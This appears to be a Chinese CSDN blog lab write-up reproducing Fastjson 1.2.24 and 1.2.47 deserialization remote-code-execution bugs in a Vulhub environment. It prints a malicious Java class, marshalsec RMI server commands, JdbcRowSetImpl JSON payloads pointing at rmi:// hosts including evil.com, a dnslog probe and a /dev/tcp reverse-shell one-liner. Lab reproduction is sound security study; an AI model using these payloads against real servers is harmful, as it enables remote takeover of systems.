vulhub漏洞复现十四_fastjson

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量1.2k 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122682469
版权

前言

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞环境

靶  场:192.168.4.10_ubuntu

攻击机:192.168.4.29_kali

一、 fastjson 1.2.24 反序列化导致任意命令执行漏洞

漏洞详细

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

环境搭建

#docker-compose up -d

环境运行后,访问`http://your-ip:8090`即可看到JSON格式的输出。

 

我们向这个地址POST一个JSON对象,即可更新服务端的信息:

```

curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'

```

可见服务端更新数据

制造POST数据包,dnslog测试

POST / HTTP/1.1

Host: 192.168.4.10:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/json

Content-Length: 68

{"zeo":{"@type":"java.net.Inet4Address","val":"4tkywj.dnslog.cn"}}

 

 

漏洞复现

1.上传文件测试

1.1 编译恶意类exploit.jar,得到exploit.class,将两个文件放到VPS上同一个文件夹下

‘’’

import java.io.BufferedReader;

import java.io.InputStream;

import java.io.InputStreamReader;

public class Exploit{

    public Exploit() throws Exception {

        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/success666"});

        InputStream is = p.getInputStream();

        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;

        while((line = reader.readLine()) != null) {

            System.out.println(line);

        }

        p.waitFor();

        is.close();

        reader.close();

        p.destroy();

    }

    public static void main(String[] args) throws Exception {

    }

}

‘’’

 

1.2 在VPS上搭建http服务,就在fastjson文件下python3 -m http.server 11111

 

1.3 搭建RMI服务,使用 marshalsec-0.0.3-SNAPSHOT-all.jar

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.4.29:11111/#Exploit" 9999

 

1.4 提交payload(500则成功)

请求:

POST / HTTP/1.1

Host: 192.168.4.10:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Connection: close

Content-Type: application/json

Content-Length: 139

{

  "b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://192.168.4.10:9999/Exploit",

 "autoCommit":true

 }

响应:

HTTP/1.1 500

Content-Type: application/json

Content-Length: 137

Date: Tue, 25 Jan 2022 03:13:49 GMT

Connection: close

{

"timestamp":1643080429838,

"status":500,

"error":"Internal Server Error",

"message":"set property error, autoCommit",

"path":"/"

}

成功收到

可见,命令`touch /tmp/success666`已成功执行:

 

2. 同理可制造反弹shell("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.4.10/19111 0>&1");

二、 Fastjson 1.2.47 远程命令执行漏洞

漏洞详情

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

环境搭建

#docker-compose up -d

环境启动后,访问`http://your-ip:8090`即可看到一个json对象被返回,我们将content-type修改为`application/json`后可向其POST新的JSON对象,后端会利用fastjson进行解析。

 

漏洞复现

同上,最后提交更改payload

```

向靶场服务器发送Payload:

```

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://evil.com:9999/Exploit",

        "autoCommit":true

    }

}

```

 

可见,命令`touch /tmp/success666`已成功执行:

 

Revenge_scan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub漏洞——fastjson
weixin_45808483的博客
12-05 3528
我们只知道一个IP nmap扫描端口 我们可以看到 8090opsmessaging Xary扫描没有发漏洞 访问 8090 端口 fastjson反序列化漏洞验证POC DNSLog Platform 获取dnslog burp抓包修改数据包 POST Content-Type: application/json {"zeo":{"@type":"java.net.Inet4Address","val":"m7ds09.dnslog.cn"}} //va.
vulhub-spring漏洞
qq_51922767的博客
09-14 2567
vulhub-spring漏洞
[ vulhub漏洞篇 ] vulhub 漏洞集合(含漏洞文章连接)
小司机的奥拓
04-23 1615
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部,欢迎持续订阅我也会不定期再中间更新文章链接目的:以 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhub漏洞77_zabbix
weixin_44193247的博客
02-14 1536
vulhub漏洞练习篇
Vulhub靶场之Tomcat漏洞
weixin_66717977的博客
06-30 428
tomcat漏洞
fastjson-1.2.66_fastjson-1.2.66.jar_Fastjson_
09-30
《深入解析Fastjson 1.2.66版本》 Fastjson是阿里巴巴开源的一个高性能的JSON库,它在Java世界中被广泛使用,为开发者提供了快速、方便地处理JSON数据的能力。Fastjson 1.2.66是该库的一个稳定版本,其核心功能包括...
gson2.8.1_fastjson1.2.2
09-14
gson2.8.1的jar包_fastjson1.2.2的jar包,方便大家直接在java代码中使用,gson2.8.1的jar包_fastjson1.2.2的jar包,方便大家直接在java代码中使用
Java_FASTJSON 20x发布更快,更安全,建议您升级.zip
最新发布
05-22
至于“fastjson_master.zip”,这可能是Fastjson源码的zip文件,供开发者研究和学习使用。通过查看源码,开发者可以深入了解Fastjson的实原理,甚至可以根据自身需求进行定制化开发。 总而言之,Java_FASTJSON ...
Vulhub漏洞
weixin_45995579的博客
09-30 1703
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
Fastjson 1.2.24反序列化漏洞Vulhub)使用方法
R0ot
03-12 855
Fastjson是阿里巴巴的一个开源JSON处理库,它可以实Java对象与JSON之间的转换。然而,在Fastjson 1.2.24版本中,存在一个反序列化漏洞,攻击者可以通过构造恶意的JSON数据来触发该漏洞,进而执行任意代码,获取服务器敏感信息,甚至控制整个服务器。Vulhub是一个漏洞集成环境,方便安全研究人员进行漏洞和研究。本文将介绍如何使用Vulhub来搭建Fastjson 1.2.24反序列化漏洞环境,并演示漏洞的使用方法。
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
m0_67621628的博客
03-22 2319
2.编译并启动环境 docker-compose up -d 3.查看环境运行状态 docker ps | grep rce 访问 8090 端口 []( )漏洞利用 首先 vulhub 给出的提示如下 因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制, 我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 首先编译并上传命令执行代码,如http://evil
APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的与分析
smellycat000的专栏
12-23 1299
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞。1.2 简介相关的重点类和方法:org.apache.xmlrpc.parser.Serializabl...
挖洞经验之某次任意用户登录漏洞挖掘
weixin_30951389的博客
06-18 765
今天测试时发一个任意用户登录漏洞,简单记录一下(em...写得真的很简单的那种!) 登录成功后的一个请求,里面包含了当前登录用户的用户名和user_id: 后面紧接着一个包含敏感信息的数据包,如下: 可以看到返回信息中包含了当前用户的密码MD5,且可以正常解密。更换为其他的user_id: 可以看到,返回了其他user_id的密码,但是,正常情况下,只有在成功登录一个用户后才...
linux漏洞挖掘nebula,Exploit-Exercises-Nebula
weixin_30830161的博客
05-16 246
这关给了一个Perl写的CGI程序,根据thttpd.conf的配置可知该CGI程序监听的1616端口。在虚拟机畅通的情况下直接通过http://192.168.56.101:1616/index.cgi 访问(192.168.56.101是我自己配置的IP地址,读者需要自己配置)。index.cgi的代码如下:#!/usr/bin/env perluse CGI qw{param};print ...
vulhub漏洞】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3661
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
android arraylist 序列化,反序列化类型为ArrayList的字段时,如果value=null,则会报错...
weixin_39746869的博客
05-29 431
使用的是1.1.67.android版本最近遇到一个问题。JavaBean例举:data class Test(var list: List? = null)给到的json为:{ "list":null }这时候进行反序列化就会报错,提示”set property error, list“。引起错误的信息如下:Caused by: java.lang.NullPointerException: n...
fastjson反序列化漏洞vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值